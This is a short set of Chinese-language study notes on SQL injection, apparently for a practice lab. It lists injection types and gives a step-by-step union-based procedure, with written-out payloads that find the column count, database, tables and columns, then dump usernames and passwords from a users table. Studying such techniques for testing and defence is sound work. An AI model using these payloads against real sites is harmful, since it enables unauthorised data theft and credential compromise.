分类:
整型
字符型
联合查询
报错注入
布尔型盲注
时间型盲注
二次注入
堆叠注入
宽字节注入
注入流程:
测试注入点
判断闭合
测数列 order by
判断显示位 union select 1,2,3,4
查库名 union select 1,2,database() -- +
查表名 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- +
查字段 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- +
查数据 union select 1,2,group_concat(username,0x23,password) from security.users --+
其他:
group_concat():逗号分隔输出